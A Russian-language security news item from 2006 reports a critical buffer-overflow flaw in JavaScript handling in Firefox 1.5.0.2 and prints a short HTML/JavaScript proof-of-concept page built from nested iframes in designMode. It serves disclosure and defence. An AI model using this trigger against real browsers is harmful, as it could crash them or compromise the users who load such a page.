Реклама

Direct Marketing: direct mail перевод от компании Conmark. Direct Mail.; Почтовая служба Конмарк: рассылка по почте, почтовая рассылка по базе данных России.; Акция авиабилеты aviarost. ru: бронирование и продажа авиабилетов через сайт.
Главная arrow Новости arrow Безопасность arrow Ужасы мира браузеров 2: снова FireFox

Ужасы мира браузеров 2: снова FireFox

25.04.2006 | Mongoose | Безопасность ,

Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
Опасность: Критическая
Наличие эксплоита: Да
Описание: Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе.

URL производителя: mozilla.com
Решение: Способов устранения уязвимости не существует в настоящее время.

Пример:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>

Источник: Security Lab

Комментариев 233
« Пред.   След. »